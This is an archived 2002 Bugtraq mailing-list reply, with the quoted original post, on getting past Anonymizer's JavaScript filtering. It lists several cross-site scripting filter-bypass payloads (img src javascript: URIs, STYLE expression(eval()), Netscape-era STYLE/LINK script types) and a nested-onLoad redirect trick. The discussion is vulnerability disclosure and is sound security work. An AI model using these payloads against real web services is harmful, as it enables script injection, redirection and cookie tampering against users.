Re: Bypassing javascript filters - problem N3.

From: fozzyat_private
Date: Tue Apr 02 2002 - 07:48:23 PST


    Hello,
    
    I took a quick look at it. This service seems to be vulnerable to several
    known attacks against webmails.
    I successfully injected unfiltered javascript into a web page browsed
    through Anonymizer using:
    
    * <img aaa="bbb>" src="javascript:alert('beep');">  
    (the original idea was published by Mark Slemko on vuln-dev, 23 Feb 2000...
    but is still ignored on many webmails !)
    
    * <P STYLE="left:expression(eval('alert(\'boop\')'))">  (thx to Guninski -
    Bugtraq 1999)
    
    * Some things that seem to work only with Netscape 4.x, like:
    <STYLE TYPE="text/javascript">alert('biip');</style>
    <STYLE TYPE="application/x-javascript">alert('burp');</style>
    <LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://.../script.js">
    (thx to Jeremiah Grossman - WhiteHatSec Aug 2001)
    
    ...and probably more !...
    
    I wish good luck to Anonymizer, because what they are trying to do is
    very close to "malicious html filtering" in webmails, and it seems to be
    really difficult for webmail sites to set up good filters. I hope Anonymizer
    will show the way to good web privacy.
    
    FozZy
    
    Hackademy - Paris.
    Hackerz Voice International Edition
    http://www.dmpfrance.com
    
    Alexander K. Yezhov wrote:
    
    > Hello bugtraq,
    > 
    >   Title: Bypassing JavaScript filters
    >   Service: Anonymizer, maybe similar services
    > 
    >   Description:
    > 
    >   Anonymizer  offers free and commercial services that allow browsing the
    >   web safely. Since JavaScript can be dangerous, all script blocks and
    >   events are cut from html.
    > 
    >   Problem N3:
    > 
    >   Maybe  you  remember  the problem I've reported in 2001 - JavaScript
    >   code  could  be  executed  after parsing the html by Anonymizer. The
    >   same principle of "JavaScript inside JavaScript" gave me the working
    >   example of redirecting Anonymizer users recently.
    > 
    >   Demo is available as Test N3 at
    >   http://anon.free.anonymizer.com/http://tools-on.net/you.shtml
    > 
    >   The part of the code before parsing:
    > 
    >   onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970
    >   onLoad="location='unprotected_location';"
    > 
    >   The same code after parsing:
    > 
    >   onLoad="location='unprotected_location';"
    >   
    >   Errors  generated  for visitors without Anonymizer are suppressed by
    >   window.onError handler.
    > 
    >   Problem status:
    >   
    >   Anonymizer has been contacted and patched already.
    > 
    > Best regards, Alexander                          
    > 
    > -----------------------------------------------------------------------
    >          MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000
    >   http://leader.ru http://tools-on.net (Security & Privacy on the Net)
    > -----------------------------------------------------------------------
    > 
    



    This archive was generated by hypermail 2b30 : Wed Apr 03 2002 - 16:55:08 PST